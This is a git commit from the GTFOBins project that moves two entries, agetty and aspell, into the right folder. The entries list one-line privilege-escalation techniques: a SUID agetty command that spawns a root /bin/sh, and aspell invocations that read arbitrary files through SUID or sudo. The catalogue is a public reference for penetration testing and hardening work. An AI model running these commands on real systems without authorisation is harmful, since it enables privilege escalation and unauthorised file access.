Move wrongly placed GTFOBins in the right location

This commit is contained in:
Andrea Cardaci
2022-01-26 22:59:40 +01:00
parent 1b796c0d88
commit 1ab481cbd0
2 changed files with 0 additions and 0 deletions

5
_gtfobins/agetty.md Normal file
View File

@@ -0,0 +1,5 @@
---
functions:
suid:
- code: ./agetty -o -p -l /bin/sh -a root tty
---

16
_gtfobins/aspell.md Normal file
View File

@@ -0,0 +1,16 @@
---
description: The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.
functions:
file-read:
- code: |
LFILE=file_to_read
aspell -c "$LFILE"
suid:
- code: |
LFILE=file_to_read
./aspell -c "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo aspell -c "$LFILE"
---